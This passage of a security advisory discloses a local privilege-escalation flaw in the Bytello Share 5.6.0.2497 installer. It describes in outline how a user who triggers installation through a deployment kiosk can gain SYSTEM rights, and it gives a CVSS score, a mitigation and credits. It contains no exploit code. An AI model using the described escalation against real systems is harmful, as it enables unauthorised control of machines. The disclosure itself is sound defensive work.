Note that the installer needs administrative rights to run. However, we were able to exploit this in a scenario where all users were able to request the installation of the software using a web interface provided by the software deployment solution. In this case, the user can trigger the execution of the installer with elevated rights and then exploit the installation process to gain SYSTEM privileges.

The vulnerability was not acknowledged by the manufacturer and it is therefore unlikely that it will be fixed. Please refer to the Mitigation section on how to protect your environment.

CVSS Score
6.7 (CVSS v3)

Affected Version
Bytello Share 5.6.0.2497

Mitigation
We recommend refraining from using the Bytello Share Installer in scenarios where an unprivileged user can trigger the installation (e.g. using a Software Kiosk).

Credits
Kolja Grassmann (cirosec GmbH)

Timeline

Do you want to protect your systems? Feel free to get in touch with us.
Search
Search